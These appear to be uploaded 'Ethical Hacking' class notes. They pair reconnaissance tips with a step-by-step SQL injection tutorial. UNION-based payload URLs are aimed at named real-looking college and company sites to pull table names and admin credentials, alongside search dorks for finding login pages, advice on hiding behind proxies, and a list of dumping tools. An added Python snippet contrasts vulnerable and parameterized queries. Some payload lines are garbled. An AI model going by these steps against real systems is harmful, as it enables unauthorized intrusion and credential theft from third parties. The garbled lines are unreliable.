Ethical Hacking

This document provides instructions for gathering information about websites and databases using techniques like DNS lookups, reverse IP mapping, and information gathering using search engines and plugins. It then describes how to hack into websites using basic and advanced SQL injection methods like inferring the database name, tables, columns, and extracting data like usernames and passwords. The steps involve finding login pages, adding SQL code to URLs, and using tools like SQLMap to automate the process.

Uploaded by

Prachi Tripathi

www.allwhois.com
2.Nslookup - IP from cmd
cmd>nslookup facebook.com

3.Reverse IP mapping - domains hosted on the same server


reverse Email lookup tool (you get signal)
search email

4.Info gathering of website using plugin


Wappalyzer
Apache/ Unix/ Nginx/ Litespeed - Linux
Microsoft/ IIS/ Asp.net - WIN OS
glassfish - Java OS

5.Proxy Servers - Open Servers


www.kproxy.com
www.boomproxy.com
www.hidemy*.com - Maintain logs
VPN - Virtual Private Network
http://- 443 - No logs
http://vpngate.net/ - download vpn client
whatismyip.com

6.Info gathering using search engine


www.kartoo.com
www.maltego.org
www.shodan.io

PORTS - tunnels (65500+)


Physical -USB, Serial Port
Virtual - 1- 65535
https:// - 443
http:// - 80
ftp - 21
smtp - 25
POP - 110

to hack a website (sunny_3459@yahoo.in)

1.Basic SQL Injection / Authentication Bypass


SQL -
sunny sunny
select * from member where userid ='sunny'
and password='sunny'
step 1: find out login page of website
site:iisc.ac.in
pk inurl:/login
pk inurl:/admin
pk inurl:/cpane
pk inurl:/cp

iisc.ac.in intext:username
intext

guessing useselest 1 * from member where userid ='admin, and a
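
The login query above, rebuilt as an added example (not part of the original notes) to show why it is bypassable and how a parameterized query closes the hole. The in-memory SQLite table, the function names and the sample credentials are constructed for illustration; the test input uses only the quote and the `--` end-of-query marker these notes describe.

```python
import sqlite3

def make_db():
    # Constructed in-memory table mirroring the notes' `member` query.
    # Plaintext passwords only mirror that query; real systems store hashes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (userid TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO member VALUES ('sunny', 'sunny')")
    db.execute("INSERT INTO member VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, userid, password):
    # Vulnerable form: input is pasted into the SQL text, so a quote in
    # `userid` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT userid FROM member WHERE userid = '" + userid +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed query; a web app would show an error page

def login_param(db, userid, password):
    # Hardened form: placeholders keep the input as data, never as SQL.
    sql = "SELECT userid FROM member WHERE userid = ? AND password = ?"
    return db.execute(sql, (userid, password)).fetchone() is not None

def compare(userid, password):
    # Returns (result of vulnerable login, result of hardened login).
    db = make_db()
    try:
        return (login_concat(db, userid, password),
                login_param(db, userid, password))
    finally:
        db.close()

if __name__ == "__main__":
    cases = [("sunny", "sunny"), ("sunny", "wrong"), ("admin' --", "x")]
    for userid, password in cases:
        print(repr(userid), repr(password), compare(userid, password))
```

The two functions agree on ordinary input and differ only when the input contains SQL syntax, which is the regression check to keep in a test suite for any login handler.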

2.Advanced SQL Injection


select - select info from database
insert - insert values into database
update - update values into database
delete - delete values
create - create table
drop - drop table
order by - sorting columns
schema - structure of data base
' - starting of SQL values/commands

http://site.com/news.php?id=1-
http://site.com/news/10
news title:
news content:
news author:
? - asking data from database

step 1: find out link which contains ?id=10


pk inurl:php?id=
pk inurl:asp?id=
pk inurl:a

com.pk
gov.pk

step 2: add ' after ?id=10


http://citicollege.edu.edu.pk/main.php?Id=1'
http://tncgroup.pk/content.php?Id=2'

blank page = error page = SQL Injection Vulnerable

step 3:find out number of vulnerable links:


http://citicollege.edu.pk/main.php?Id=1'
id=1 to id=1000 --
-- : end of query
number of vulnerable links are 8

step 4:find out link from which we can select data:


http://citicollege.edu.pk/main.php?
Id=-1 union all select 1,2,3,4,5,6,7,8 --
we can select data from 2 & 6

step 5:finding out database, tables & columns


Id=-1 union all select 1,database(),3,4,5,6,7,8 --
DB: citioffi_college
schema - structure of tables & columns
information_schema - stores info
table_name
information_schema.tables - table structure
column_name
information_schema.columns - column structure
Id=-1 union all select
1, table_name ,3,4,5,6,7,8 from
information_schema.tables --

for complicated websites


Id=-1 union all select
1, table_group_concat(table_name) ,3,4,5,6,7,8 from
information_schema.tables --

table_schema=database() --
lito_user

for complicated websites


Id=-1 union all select
1, table_group_concat(column_name) ,3,4,5,6,7,8 from
information_schema.columns
where table_schema='lito_user' --

table: lito_user
columns: Id,Username,Password,FullName,Email

step 6:find out row values


Id=-1 union all select 1,UserName

Id=-1 union all select 1,Password,3,4,5,6,7,8 from lito_user --


admin:admin

software:
Havij
SQL Injector
SQLMap
